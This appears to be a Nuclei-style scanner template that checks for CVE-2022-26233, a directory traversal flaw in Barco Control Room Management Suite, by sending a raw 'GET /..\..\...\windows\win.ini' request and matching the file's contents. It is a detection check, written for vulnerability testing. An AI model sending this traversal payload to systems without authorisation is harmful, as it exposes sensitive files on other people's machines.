41 lines
1.3 KiB
YAML
41 lines
1.3 KiB
YAML
id: CVE-2022-26233
|
|
|
|
info:
|
|
name: Barco Control Room Management Suite <=2.9 Build 0275 - Local File Inclusion
|
|
author: 0x_Akoko
|
|
severity: high
|
|
description: Barco Control Room Management through Suite 2.9 Build 0275 is vulnerable to local file inclusion that could allow attackers to access sensitive information and components. Requests must begin with the "GET /..\.." substring.
|
|
reference:
|
|
- https://0day.today/exploit/37579
|
|
- http://seclists.org/fulldisclosure/2022/Apr/0
|
|
- http://packetstormsecurity.com/files/166577/Barco-Control-Room-Management-Suite-Directory-Traversal.html
|
|
- https://nvd.nist.gov/vuln/detail/CVE-2022-26233
|
|
classification:
|
|
cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N
|
|
cvss-score: 7.5
|
|
cve-id: CVE-2022-26233
|
|
cwe-id: CWE-22
|
|
epss-score: 0.00413
|
|
cpe: cpe:2.3:a:barco:control_room_management_suite:*:*:*:*:*:*:*:*
|
|
metadata:
|
|
max-request: 1
|
|
vendor: barco
|
|
product: control_room_management_suite
|
|
tags: cve,cve2022,barco,lfi,seclists,packetstorm
|
|
|
|
http:
|
|
- raw:
|
|
- |+
|
|
GET /..\..\..\..\..\..\..\..\..\..\windows\win.ini HTTP/1.1
|
|
Host: {{Hostname}}
|
|
|
|
unsafe: true
|
|
matchers:
|
|
- type: word
|
|
part: body
|
|
words:
|
|
- "bit app support"
|
|
- "fonts"
|
|
- "extensions"
|
|
condition: and
|